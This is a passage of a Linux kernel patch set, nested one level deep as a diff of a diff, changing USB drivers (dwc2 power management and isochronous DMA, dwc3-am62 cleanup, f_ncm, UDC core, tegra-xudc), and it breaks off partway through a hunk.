+@@ -729,8 +729,14 @@ struct dwc2_dregs_backup {
+  * struct dwc2_hregs_backup - Holds host registers state before
+  * entering partial power down
+  * @hcfg:		Backup of HCFG register
++ * @hflbaddr:		Backup of HFLBADDR register
+  * @haintmsk:		Backup of HAINTMSK register
++ * @hcchar:		Backup of HCCHAR register
++ * @hcsplt:		Backup of HCSPLT register
+  * @hcintmsk:		Backup of HCINTMSK register
++ * @hctsiz:		Backup of HCTSIZ register
++ * @hdma:		Backup of HCDMA register
++ * @hcdmab:		Backup of HCDMAB register
+  * @hprt0:		Backup of HPTR0 register
+  * @hfir:		Backup of HFIR register
+  * @hptxfsiz:		Backup of HPTXFSIZ register
+@@ -738,8 +744,14 @@ struct dwc2_dregs_backup {
+  */
+ struct dwc2_hregs_backup {
+ 	u32 hcfg;
++	u32 hflbaddr;
+ 	u32 haintmsk;
++	u32 hcchar[MAX_EPS_CHANNELS];
++	u32 hcsplt[MAX_EPS_CHANNELS];
+ 	u32 hcintmsk[MAX_EPS_CHANNELS];
++	u32 hctsiz[MAX_EPS_CHANNELS];
++	u32 hcidma[MAX_EPS_CHANNELS];
++	u32 hcidmab[MAX_EPS_CHANNELS];
+ 	u32 hprt0;
+ 	u32 hfir;
+ 	u32 hptxfsiz;
+@@ -1084,6 +1096,7 @@ struct dwc2_hsotg {
+ 	bool needs_byte_swap;
+ 
+ 	/* DWC OTG HW Release versions */
++#define DWC2_CORE_REV_4_30a	0x4f54430a
+ #define DWC2_CORE_REV_2_71a	0x4f54271a
+ #define DWC2_CORE_REV_2_72a     0x4f54272a
+ #define DWC2_CORE_REV_2_80a	0x4f54280a
+@@ -1321,6 +1334,7 @@ int dwc2_backup_global_registers(struct dwc2_hsotg *hsotg);
+ int dwc2_restore_global_registers(struct dwc2_hsotg *hsotg);
+ 
+ void dwc2_enable_acg(struct dwc2_hsotg *hsotg);
++void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg, bool remotewakeup);
+ 
+ /* This function should be called on every hardware interrupt. */
+ irqreturn_t dwc2_handle_common_intr(int irq, void *dev);
+diff --git a/drivers/usb/dwc2/core_intr.c b/drivers/usb/dwc2/core_intr.c
+index 158ede7538548..26d752a4c3ca9 100644
+--- a/drivers/usb/dwc2/core_intr.c
++++ b/drivers/usb/dwc2/core_intr.c
+@@ -297,7 +297,8 @@ static void dwc2_handle_session_req_intr(struct dwc2_hsotg *hsotg)
+ 
+ 			/* Exit gadget mode clock gating. */
+ 			if (hsotg->params.power_down ==
+-			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended)
++			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++			    !hsotg->params.no_clock_gating)
+ 				dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		}
+ 
+@@ -322,10 +323,11 @@ static void dwc2_handle_session_req_intr(struct dwc2_hsotg *hsotg)
+  * @hsotg: Programming view of DWC_otg controller
+  *
+  */
+-static void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg)
++void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg, bool remotewakeup)
+ {
+ 	u32 glpmcfg;
+-	u32 i = 0;
++	u32 pcgctl;
++	u32 dctl;
+ 
+ 	if (hsotg->lx_state != DWC2_L1) {
+ 		dev_err(hsotg->dev, "Core isn't in DWC2_L1 state\n");
+@@ -334,37 +336,57 @@ static void dwc2_wakeup_from_lpm_l1(struct dwc2_hsotg *hsotg)
+ 
+ 	glpmcfg = dwc2_readl(hsotg, GLPMCFG);
+ 	if (dwc2_is_device_mode(hsotg)) {
+-		dev_dbg(hsotg->dev, "Exit from L1 state\n");
++		dev_dbg(hsotg->dev, "Exit from L1 state, remotewakeup=%d\n", remotewakeup);
+ 		glpmcfg &= ~GLPMCFG_ENBLSLPM;
+-		glpmcfg &= ~GLPMCFG_HIRD_THRES_EN;
++		glpmcfg &= ~GLPMCFG_HIRD_THRES_MASK;
+ 		dwc2_writel(hsotg, glpmcfg, GLPMCFG);
+ 
+-		do {
+-			glpmcfg = dwc2_readl(hsotg, GLPMCFG);
++		pcgctl = dwc2_readl(hsotg, PCGCTL);
++		pcgctl &= ~PCGCTL_ENBL_SLEEP_GATING;
++		dwc2_writel(hsotg, pcgctl, PCGCTL);
+ 
+-			if (!(glpmcfg & (GLPMCFG_COREL1RES_MASK |
+-					 GLPMCFG_L1RESUMEOK | GLPMCFG_SLPSTS)))
+-				break;
++		glpmcfg = dwc2_readl(hsotg, GLPMCFG);
++		if (glpmcfg & GLPMCFG_ENBESL) {
++			glpmcfg |= GLPMCFG_RSTRSLPSTS;
++			dwc2_writel(hsotg, glpmcfg, GLPMCFG);
++		}
++
++		if (remotewakeup) {
++			if (dwc2_hsotg_wait_bit_set(hsotg, GLPMCFG, GLPMCFG_L1RESUMEOK, 1000)) {
++				dev_warn(hsotg->dev, "%s: timeout GLPMCFG_L1RESUMEOK\n", __func__);
++				goto fail;
++				return;
++			}
++
++			dctl = dwc2_readl(hsotg, DCTL);
++			dctl |= DCTL_RMTWKUPSIG;
++			dwc2_writel(hsotg, dctl, DCTL);
+ 
+-			udelay(1);
+-		} while (++i < 200);
++			if (dwc2_hsotg_wait_bit_set(hsotg, GINTSTS, GINTSTS_WKUPINT, 1000)) {
++				dev_warn(hsotg->dev, "%s: timeout GINTSTS_WKUPINT\n", __func__);
++				goto fail;
++				return;
++			}
++		}
+ 
+-		if (i == 200) {
+-			dev_err(hsotg->dev, "Failed to exit L1 sleep state in 200us.\n");
++		glpmcfg = dwc2_readl(hsotg, GLPMCFG);
++		if (glpmcfg & GLPMCFG_COREL1RES_MASK || glpmcfg & GLPMCFG_SLPSTS ||
++		    glpmcfg & GLPMCFG_L1RESUMEOK) {
++			goto fail;
+ 			return;
+ 		}
+-		dwc2_gadget_init_lpm(hsotg);
++
++		/* Inform gadget to exit from L1 */
++		call_gadget(hsotg, resume);
++		/* Change to L0 state */
++		hsotg->lx_state = DWC2_L0;
++		hsotg->bus_suspended = false;
++fail:		dwc2_gadget_init_lpm(hsotg);
+ 	} else {
+ 		/* TODO */
+ 		dev_err(hsotg->dev, "Host side LPM is not supported.\n");
+ 		return;
+ 	}
+-
+-	/* Change to L0 state */
+-	hsotg->lx_state = DWC2_L0;
+-
+-	/* Inform gadget to exit from L1 */
+-	call_gadget(hsotg, resume);
+ }
+ 
+ /*
+@@ -385,7 +407,7 @@ static void dwc2_handle_wakeup_detected_intr(struct dwc2_hsotg *hsotg)
+ 	dev_dbg(hsotg->dev, "%s lxstate = %d\n", __func__, hsotg->lx_state);
+ 
+ 	if (hsotg->lx_state == DWC2_L1) {
+-		dwc2_wakeup_from_lpm_l1(hsotg);
++		dwc2_wakeup_from_lpm_l1(hsotg, false);
+ 		return;
+ 	}
+ 
+@@ -408,7 +430,8 @@ static void dwc2_handle_wakeup_detected_intr(struct dwc2_hsotg *hsotg)
+ 
+ 			/* Exit gadget mode clock gating. */
+ 			if (hsotg->params.power_down ==
+-			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended)
++			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++			    !hsotg->params.no_clock_gating)
+ 				dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		} else {
+ 			/* Change to L0 state */
+@@ -425,7 +448,8 @@ static void dwc2_handle_wakeup_detected_intr(struct dwc2_hsotg *hsotg)
+ 			}
+ 
+ 			if (hsotg->params.power_down ==
+-			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended)
++			    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++			    !hsotg->params.no_clock_gating)
+ 				dwc2_host_exit_clock_gating(hsotg, 1);
+ 
+ 			/*
+diff --git a/drivers/usb/dwc2/gadget.c b/drivers/usb/dwc2/gadget.c
+index 8b15742d9e8aa..cb29f9fae2f23 100644
+--- a/drivers/usb/dwc2/gadget.c
++++ b/drivers/usb/dwc2/gadget.c
+@@ -1416,6 +1416,10 @@ static int dwc2_hsotg_ep_queue(struct usb_ep *ep, struct usb_request *req,
+ 		ep->name, req, req->length, req->buf, req->no_interrupt,
+ 		req->zero, req->short_not_ok);
+ 
++	if (hs->lx_state == DWC2_L1) {
++		dwc2_wakeup_from_lpm_l1(hs, true);
++	}
++
+ 	/* Prevent new request submission when controller is suspended */
+ 	if (hs->lx_state != DWC2_L0) {
+ 		dev_dbg(hs->dev, "%s: submit request only in active state\n",
+@@ -3728,6 +3732,12 @@ static irqreturn_t dwc2_hsotg_irq(int irq, void *pw)
+ 		if (hsotg->in_ppd && hsotg->lx_state == DWC2_L2)
+ 			dwc2_exit_partial_power_down(hsotg, 0, true);
+ 
++		/* Exit gadget mode clock gating. */
++		if (hsotg->params.power_down ==
++		    DWC2_POWER_DOWN_PARAM_NONE && hsotg->bus_suspended &&
++		    !hsotg->params.no_clock_gating)
++			dwc2_gadget_exit_clock_gating(hsotg, 0);
++
+ 		hsotg->lx_state = DWC2_L0;
+ 	}
+ 
+diff --git a/drivers/usb/dwc2/hcd.c b/drivers/usb/dwc2/hcd.c
+index 35c7a4df8e717..dd5b1c5691e11 100644
+--- a/drivers/usb/dwc2/hcd.c
++++ b/drivers/usb/dwc2/hcd.c
+@@ -2701,8 +2701,11 @@ enum dwc2_transaction_type dwc2_hcd_select_transactions(
+ 			hsotg->available_host_channels--;
+ 		}
+ 		qh = list_entry(qh_ptr, struct dwc2_qh, qh_list_entry);
+-		if (dwc2_assign_and_init_hc(hsotg, qh))
++		if (dwc2_assign_and_init_hc(hsotg, qh)) {
++			if (hsotg->params.uframe_sched)
++				hsotg->available_host_channels++;
+ 			break;
++		}
+ 
+ 		/*
+ 		 * Move the QH from the periodic ready schedule to the
+@@ -2735,8 +2738,11 @@ enum dwc2_transaction_type dwc2_hcd_select_transactions(
+ 			hsotg->available_host_channels--;
+ 		}
+ 
+-		if (dwc2_assign_and_init_hc(hsotg, qh))
++		if (dwc2_assign_and_init_hc(hsotg, qh)) {
++			if (hsotg->params.uframe_sched)
++				hsotg->available_host_channels++;
+ 			break;
++		}
+ 
+ 		/*
+ 		 * Move the QH from the non-periodic inactive schedule to the
+@@ -4143,6 +4149,8 @@ void dwc2_host_complete(struct dwc2_hsotg *hsotg, struct dwc2_qtd *qtd,
+ 			 urb->actual_length);
+ 
+ 	if (usb_pipetype(urb->pipe) == PIPE_ISOCHRONOUS) {
++		if (!hsotg->params.dma_desc_enable)
++			urb->start_frame = qtd->qh->start_active_frame;
+ 		urb->error_count = dwc2_hcd_urb_get_error_count(qtd->urb);
+ 		for (i = 0; i < urb->number_of_packets; ++i) {
+ 			urb->iso_frame_desc[i].actual_length =
+@@ -4649,7 +4657,7 @@ static int _dwc2_hcd_urb_enqueue(struct usb_hcd *hcd, struct urb *urb,
+ 	}
+ 
+ 	if (hsotg->params.power_down == DWC2_POWER_DOWN_PARAM_NONE &&
+-	    hsotg->bus_suspended) {
++	    hsotg->bus_suspended && !hsotg->params.no_clock_gating) {
+ 		if (dwc2_is_device_mode(hsotg))
+ 			dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		else
+@@ -5406,9 +5414,16 @@ int dwc2_backup_host_registers(struct dwc2_hsotg *hsotg)
+ 	/* Backup Host regs */
+ 	hr = &hsotg->hr_backup;
+ 	hr->hcfg = dwc2_readl(hsotg, HCFG);
++	hr->hflbaddr = dwc2_readl(hsotg, HFLBADDR);
+ 	hr->haintmsk = dwc2_readl(hsotg, HAINTMSK);
+-	for (i = 0; i < hsotg->params.host_channels; ++i)
++	for (i = 0; i < hsotg->params.host_channels; ++i) {
++		hr->hcchar[i] = dwc2_readl(hsotg, HCCHAR(i));
++		hr->hcsplt[i] = dwc2_readl(hsotg, HCSPLT(i));
+ 		hr->hcintmsk[i] = dwc2_readl(hsotg, HCINTMSK(i));
++		hr->hctsiz[i] = dwc2_readl(hsotg, HCTSIZ(i));
++		hr->hcidma[i] = dwc2_readl(hsotg, HCDMA(i));
++		hr->hcidmab[i] = dwc2_readl(hsotg, HCDMAB(i));
++	}
+ 
+ 	hr->hprt0 = dwc2_read_hprt0(hsotg);
+ 	hr->hfir = dwc2_readl(hsotg, HFIR);
+@@ -5442,10 +5457,17 @@ int dwc2_restore_host_registers(struct dwc2_hsotg *hsotg)
+ 	hr->valid = false;
+ 
+ 	dwc2_writel(hsotg, hr->hcfg, HCFG);
++	dwc2_writel(hsotg, hr->hflbaddr, HFLBADDR);
+ 	dwc2_writel(hsotg, hr->haintmsk, HAINTMSK);
+ 
+-	for (i = 0; i < hsotg->params.host_channels; ++i)
++	for (i = 0; i < hsotg->params.host_channels; ++i) {
++		dwc2_writel(hsotg, hr->hcchar[i], HCCHAR(i));
++		dwc2_writel(hsotg, hr->hcsplt[i], HCSPLT(i));
+ 		dwc2_writel(hsotg, hr->hcintmsk[i], HCINTMSK(i));
++		dwc2_writel(hsotg, hr->hctsiz[i], HCTSIZ(i));
++		dwc2_writel(hsotg, hr->hcidma[i], HCDMA(i));
++		dwc2_writel(hsotg, hr->hcidmab[i], HCDMAB(i));
++	}
+ 
+ 	dwc2_writel(hsotg, hr->hprt0, HPRT0);
+ 	dwc2_writel(hsotg, hr->hfir, HFIR);
+@@ -5610,10 +5632,12 @@ int dwc2_host_exit_hibernation(struct dwc2_hsotg *hsotg, int rem_wakeup,
+ 	dwc2_writel(hsotg, hr->hcfg, HCFG);
+ 
+ 	/* De-assert Wakeup Logic */
+-	gpwrdn = dwc2_readl(hsotg, GPWRDN);
+-	gpwrdn &= ~GPWRDN_PMUACTV;
+-	dwc2_writel(hsotg, gpwrdn, GPWRDN);
+-	udelay(10);
++	if (!(rem_wakeup && hsotg->hw_params.snpsid >= DWC2_CORE_REV_4_30a)) {
++		gpwrdn = dwc2_readl(hsotg, GPWRDN);
++		gpwrdn &= ~GPWRDN_PMUACTV;
++		dwc2_writel(hsotg, gpwrdn, GPWRDN);
++		udelay(10);
++	}
+ 
+ 	hprt0 = hr->hprt0;
+ 	hprt0 |= HPRT0_PWR;
+@@ -5638,6 +5662,13 @@ int dwc2_host_exit_hibernation(struct dwc2_hsotg *hsotg, int rem_wakeup,
+ 		hprt0 |= HPRT0_RES;
+ 		dwc2_writel(hsotg, hprt0, HPRT0);
+ 
++		/* De-assert Wakeup Logic */
++		if ((rem_wakeup && hsotg->hw_params.snpsid >= DWC2_CORE_REV_4_30a)) {
++			gpwrdn = dwc2_readl(hsotg, GPWRDN);
++			gpwrdn &= ~GPWRDN_PMUACTV;
++			dwc2_writel(hsotg, gpwrdn, GPWRDN);
++			udelay(10);
++		}
+ 		/* Wait for Resume time and then program HPRT again */
+ 		mdelay(100);
+ 		hprt0 &= ~HPRT0_RES;
+diff --git a/drivers/usb/dwc2/hcd_ddma.c b/drivers/usb/dwc2/hcd_ddma.c
+index 6b4d825e97a2d..79582b102c7ed 100644
+--- a/drivers/usb/dwc2/hcd_ddma.c
++++ b/drivers/usb/dwc2/hcd_ddma.c
+@@ -559,7 +559,7 @@ static void dwc2_init_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 	idx = qh->td_last;
+ 	inc = qh->host_interval;
+ 	hsotg->frame_number = dwc2_hcd_get_frame_number(hsotg);
+-	cur_idx = dwc2_frame_list_idx(hsotg->frame_number);
++	cur_idx = idx;
+ 	next_idx = dwc2_desclist_idx_inc(qh->td_last, inc, qh->dev_speed);
+ 
+ 	/*
+@@ -866,6 +866,8 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ {
+ 	struct dwc2_dma_desc *dma_desc;
+ 	struct dwc2_hcd_iso_packet_desc *frame_desc;
++	u16 frame_desc_idx;
++	struct urb *usb_urb = qtd->urb->priv;
+ 	u16 remain = 0;
+ 	int rc = 0;
+ 
+@@ -878,8 +880,11 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 				DMA_FROM_DEVICE);
+ 
+ 	dma_desc = &qh->desc_list[idx];
++	frame_desc_idx = (idx - qtd->isoc_td_first) & (usb_urb->number_of_packets - 1);
+ 
+-	frame_desc = &qtd->urb->iso_descs[qtd->isoc_frame_index_last];
++	frame_desc = &qtd->urb->iso_descs[frame_desc_idx];
++	if (idx == qtd->isoc_td_first)
++		usb_urb->start_frame = dwc2_hcd_get_frame_number(hsotg);
+ 	dma_desc->buf = (u32)(qtd->urb->dma + frame_desc->offset);
+ 	if (chan->ep_is_in)
+ 		remain = (dma_desc->status & HOST_DMA_ISOC_NBYTES_MASK) >>
+@@ -900,7 +905,7 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 		frame_desc->status = 0;
+ 	}
+ 
+-	if (++qtd->isoc_frame_index == qtd->urb->packet_count) {
++	if (++qtd->isoc_frame_index == usb_urb->number_of_packets) {
+ 		/*
+ 		 * urb->status is not used for isoc transfers here. The
+ 		 * individual frame_desc status are used instead.
+@@ -1005,11 +1010,11 @@ static void dwc2_complete_isoc_xfer_ddma(struct dwc2_hsotg *hsotg,
+ 				return;
+ 			idx = dwc2_desclist_idx_inc(idx, qh->host_interval,
+ 						    chan->speed);
+-			if (!rc)
++			if (rc == 0)
+ 				continue;
+ 
+-			if (rc == DWC2_CMPL_DONE)
+-				break;
++			if (rc == DWC2_CMPL_DONE || rc == DWC2_CMPL_STOP)
++				goto stop_scan;
+ 
+ 			/* rc == DWC2_CMPL_STOP */
+ 
+diff --git a/drivers/usb/dwc2/hw.h b/drivers/usb/dwc2/hw.h
+index 13abdd5f67529..12f8c7f86dc98 100644
+--- a/drivers/usb/dwc2/hw.h
++++ b/drivers/usb/dwc2/hw.h
+@@ -698,7 +698,7 @@
+ #define TXSTS_QTOP_TOKEN_MASK		(0x3 << 25)
+ #define TXSTS_QTOP_TOKEN_SHIFT		25
+ #define TXSTS_QTOP_TERMINATE		BIT(24)
+-#define TXSTS_QSPCAVAIL_MASK		(0xff << 16)
++#define TXSTS_QSPCAVAIL_MASK		(0x7f << 16)
+ #define TXSTS_QSPCAVAIL_SHIFT		16
+ #define TXSTS_FSPCAVAIL_MASK		(0xffff << 0)
+ #define TXSTS_FSPCAVAIL_SHIFT		0
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index 58f53faab340f..2e4c6884f36a4 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -298,7 +298,7 @@ static int dwc2_driver_remove(struct platform_device *dev)
+ 
+ 	/* Exit clock gating when driver is removed. */
+ 	if (hsotg->params.power_down == DWC2_POWER_DOWN_PARAM_NONE &&
+-	    hsotg->bus_suspended) {
++	    hsotg->bus_suspended && !hsotg->params.no_clock_gating) {
+ 		if (dwc2_is_device_mode(hsotg))
+ 			dwc2_gadget_exit_clock_gating(hsotg, 0);
+ 		else
+diff --git a/drivers/usb/dwc3/dwc3-am62.c b/drivers/usb/dwc3/dwc3-am62.c
+index 173cf3579c55d..ad8a2eadb472b 100644
+--- a/drivers/usb/dwc3/dwc3-am62.c
++++ b/drivers/usb/dwc3/dwc3-am62.c
+@@ -89,7 +89,7 @@
+ 
+ #define DWC3_AM62_AUTOSUSPEND_DELAY	100
+ 
+-struct dwc3_data {
++struct dwc3_am62 {
+ 	struct device *dev;
+ 	void __iomem *usbss;
+ 	struct clk *usb2_refclk;
+@@ -115,19 +115,19 @@ static const int dwc3_ti_rate_table[] = {	/* in KHZ */
+ 	52000,
+ };
+ 
+-static inline u32 dwc3_ti_readl(struct dwc3_data *data, u32 offset)
++static inline u32 dwc3_ti_readl(struct dwc3_am62 *am62, u32 offset)
+ {
+-	return readl((data->usbss) + offset);
++	return readl((am62->usbss) + offset);
+ }
+ 
+-static inline void dwc3_ti_writel(struct dwc3_data *data, u32 offset, u32 value)
++static inline void dwc3_ti_writel(struct dwc3_am62 *am62, u32 offset, u32 value)
+ {
+-	writel(value, (data->usbss) + offset);
++	writel(value, (am62->usbss) + offset);
+ }
+ 
+-static int phy_syscon_pll_refclk(struct dwc3_data *data)
++static int phy_syscon_pll_refclk(struct dwc3_am62 *am62)
+ {
+-	struct device *dev = data->dev;
++	struct device *dev = am62->dev;
+ 	struct device_node *node = dev->of_node;
+ 	struct of_phandle_args args;
+ 	struct regmap *syscon;
+@@ -139,16 +139,16 @@ static int phy_syscon_pll_refclk(struct dwc3_data *data)
+ 		return PTR_ERR(syscon);
+ 	}
+ 
+-	data->syscon = syscon;
++	am62->syscon = syscon;
+ 
+ 	ret = of_parse_phandle_with_fixed_args(node, "ti,syscon-phy-pll-refclk", 1,
+ 					       0, &args);
+ 	if (ret)
+ 		return ret;
+ 
+-	data->offset = args.args[0];
++	am62->offset = args.args[0];
+ 
+-	ret = regmap_update_bits(data->syscon, data->offset, PHY_PLL_REFCLK_MASK, data->rate_code);
++	ret = regmap_update_bits(am62->syscon, am62->offset, PHY_PLL_REFCLK_MASK, am62->rate_code);
+ 	if (ret) {
+ 		dev_err(dev, "failed to set phy pll reference clock rate\n");
+ 		return ret;
+@@ -161,32 +161,32 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *node = pdev->dev.of_node;
+-	struct dwc3_data *data;
++	struct dwc3_am62 *am62;
+ 	int i, ret;
+ 	unsigned long rate;
+ 	u32 reg;
+ 
+-	data = devm_kzalloc(dev, sizeof(*data), GFP_KERNEL);
+-	if (!data)
++	am62 = devm_kzalloc(dev, sizeof(*am62), GFP_KERNEL);
++	if (!am62)
+ 		return -ENOMEM;
+ 
+-	data->dev = dev;
+-	platform_set_drvdata(pdev, data);
++	am62->dev = dev;
++	platform_set_drvdata(pdev, am62);
+ 
+-	data->usbss = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(data->usbss)) {
++	am62->usbss = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(am62->usbss)) {
+ 		dev_err(dev, "can't map IOMEM resource\n");
+-		return PTR_ERR(data->usbss);
++		return PTR_ERR(am62->usbss);
+ 	}
+ 
+-	data->usb2_refclk = devm_clk_get(dev, "ref");
+-	if (IS_ERR(data->usb2_refclk)) {
++	am62->usb2_refclk = devm_clk_get(dev, "ref");
++	if (IS_ERR(am62->usb2_refclk)) {
+ 		dev_err(dev, "can't get usb2_refclk\n");
+-		return PTR_ERR(data->usb2_refclk);
++		return PTR_ERR(am62->usb2_refclk);
+ 	}
+ 
+ 	/* Calculate the rate code */
+-	rate = clk_get_rate(data->usb2_refclk);
++	rate = clk_get_rate(am62->usb2_refclk);
+ 	rate /= 1000;	// To KHz
+ 	for (i = 0; i < ARRAY_SIZE(dwc3_ti_rate_table); i++) {
+ 		if (dwc3_ti_rate_table[i] == rate)
+@@ -198,20 +198,20 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	data->rate_code = i;
++	am62->rate_code = i;
+ 
+ 	/* Read the syscon property and set the rate code */
+-	ret = phy_syscon_pll_refclk(data);
++	ret = phy_syscon_pll_refclk(am62);
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* VBUS divider select */
+-	data->vbus_divider = device_property_read_bool(dev, "ti,vbus-divider");
+-	reg = dwc3_ti_readl(data, USBSS_PHY_CONFIG);
+-	if (data->vbus_divider)
++	am62->vbus_divider = device_property_read_bool(dev, "ti,vbus-divider");
++	reg = dwc3_ti_readl(am62, USBSS_PHY_CONFIG);
++	if (am62->vbus_divider)
+ 		reg |= 1 << USBSS_PHY_VBUS_SEL_SHIFT;
+ 
+-	dwc3_ti_writel(data, USBSS_PHY_CONFIG, reg);
++	dwc3_ti_writel(am62, USBSS_PHY_CONFIG, reg);
+ 
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+@@ -219,7 +219,7 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 	 * Don't ignore its dependencies with its children
+ 	 */
+ 	pm_suspend_ignore_children(dev, false);
+-	clk_prepare_enable(data->usb2_refclk);
++	clk_prepare_enable(am62->usb2_refclk);
+ 	pm_runtime_get_noresume(dev);
+ 
+ 	ret = of_platform_populate(node, NULL, NULL, dev);
+@@ -229,9 +229,9 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* Set mode valid bit to indicate role is valid */
+-	reg = dwc3_ti_readl(data, USBSS_MODE_CONTROL);
++	reg = dwc3_ti_readl(am62, USBSS_MODE_CONTROL);
+ 	reg |= USBSS_MODE_VALID;
+-	dwc3_ti_writel(data, USBSS_MODE_CONTROL, reg);
++	dwc3_ti_writel(am62, USBSS_MODE_CONTROL, reg);
+ 
+ 	/* Setting up autosuspend */
+ 	pm_runtime_set_autosuspend_delay(dev, DWC3_AM62_AUTOSUSPEND_DELAY);
+@@ -241,35 +241,27 @@ static int dwc3_ti_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_pm_disable:
+-	clk_disable_unprepare(data->usb2_refclk);
++	clk_disable_unprepare(am62->usb2_refclk);
+ 	pm_runtime_disable(dev);
+ 	pm_runtime_set_suspended(dev);
+ 	return ret;
+ }
+ 
+-static int dwc3_ti_remove_core(struct device *dev, void *c)
+-{
+-	struct platform_device *pdev = to_platform_device(dev);
+-
+-	platform_device_unregister(pdev);
+-	return 0;
+-}
+-
+ static int dwc3_ti_remove(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+-	struct dwc3_data *data = platform_get_drvdata(pdev);
++	struct dwc3_am62 *am62 = platform_get_drvdata(pdev);
+ 	u32 reg;
+ 
+-	device_for_each_child(dev, NULL, dwc3_ti_remove_core);
++	pm_runtime_get_sync(dev);
++	of_platform_depopulate(dev);
+ 
+ 	/* Clear mode valid bit */
+-	reg = dwc3_ti_readl(data, USBSS_MODE_CONTROL);
++	reg = dwc3_ti_readl(am62, USBSS_MODE_CONTROL);
+ 	reg &= ~USBSS_MODE_VALID;
+-	dwc3_ti_writel(data, USBSS_MODE_CONTROL, reg);
++	dwc3_ti_writel(am62, USBSS_MODE_CONTROL, reg);
+ 
+ 	pm_runtime_put_sync(dev);
+-	clk_disable_unprepare(data->usb2_refclk);
+ 	pm_runtime_disable(dev);
+ 	pm_runtime_set_suspended(dev);
+ 
+@@ -280,18 +272,18 @@ static int dwc3_ti_remove(struct platform_device *pdev)
+ #ifdef CONFIG_PM
+ static int dwc3_ti_suspend_common(struct device *dev)
+ {
+-	struct dwc3_data *data = dev_get_drvdata(dev);
++	struct dwc3_am62 *am62 = dev_get_drvdata(dev);
+ 
+-	clk_disable_unprepare(data->usb2_refclk);
++	clk_disable_unprepare(am62->usb2_refclk);
+ 
+ 	return 0;
+ }
+ 
+ static int dwc3_ti_resume_common(struct device *dev)
+ {
+-	struct dwc3_data *data = dev_get_drvdata(dev);
++	struct dwc3_am62 *am62 = dev_get_drvdata(dev);
+ 
+-	clk_prepare_enable(data->usb2_refclk);
++	clk_prepare_enable(am62->usb2_refclk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index 5e78fcc63e4d3..14601a2d25427 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1348,7 +1348,7 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 	if (to_process == 1 &&
+ 	    (*(unsigned char *)(ntb_ptr + block_len) == 0x00)) {
+ 		to_process--;
+-	} else if (to_process > 0) {
++	} else if ((to_process > 0) && (block_len != 0)) {
+ 		ntb_ptr = (unsigned char *)(ntb_ptr + block_len);
+ 		goto parse_ntb;
+ 	}
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 0edd9e53fc5a1..82a10774a7ebc 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -292,7 +292,9 @@ int usb_ep_queue(struct usb_ep *ep,
+ {
+ 	int ret = 0;
+ 
+-	if (WARN_ON_ONCE(!ep->enabled && ep->address)) {
++	if (!ep->enabled && ep->address) {
++		pr_debug("USB gadget: queue request to disabled ep 0x%x (%s)\n",
++				 ep->address, ep->name);
+ 		ret = -ESHUTDOWN;
+ 		goto out;
+ 	}
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index a8cadc45c65aa..fd7a9535973ed 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -3486,8 +3486,8 @@ static void tegra_xudc_device_params_init(struct tegra_xudc *xudc)
+ 
+ static int tegra_xudc_phy_get(struct tegra_xudc *xudc)
+ {
+-	int err = 0, usb3;
+-	unsigned int i;
++	int err = 0, usb3_companion_port;
++	unsigned int i, j;
+ 
+ 	xudc->utmi_phy = devm_kcalloc(xudc->dev, xudc->soc->num_phys,
+ 					   sizeof(*xudc->utmi_phy), GFP_KERNEL);
+@@ -3515,7 +3515,7 @@ static int tegra_xudc_phy_get(struct tegra_xudc *xudc)
+ 		if (IS_ERR(xudc->utmi_phy[i])) {
+ 			err = PTR_ERR(xudc->utmi_phy[i]);
+ 			dev_err_probe(xudc->dev, err,
+-				      "failed to get usb2-%d PHY\n", i);
++				"failed to get PHY for phy-name usb2-%d\n", i);
+ 			goto clean_up;
+ 		} else if (xudc->utmi_phy[i]) {
+ 			/* Get usb-phy, if utmi phy is available */
+@@ -3534,19 +3534,30 @@ static int tegra_xudc_phy_get(struct tegra_xudc *xudc)
+ 		}
+ 
+ 		/* Get USB3 phy */
+-		usb3 = tegra_xusb_padctl_get_usb3_companion(xudc->padctl, i);
+-		if (usb3 < 0)
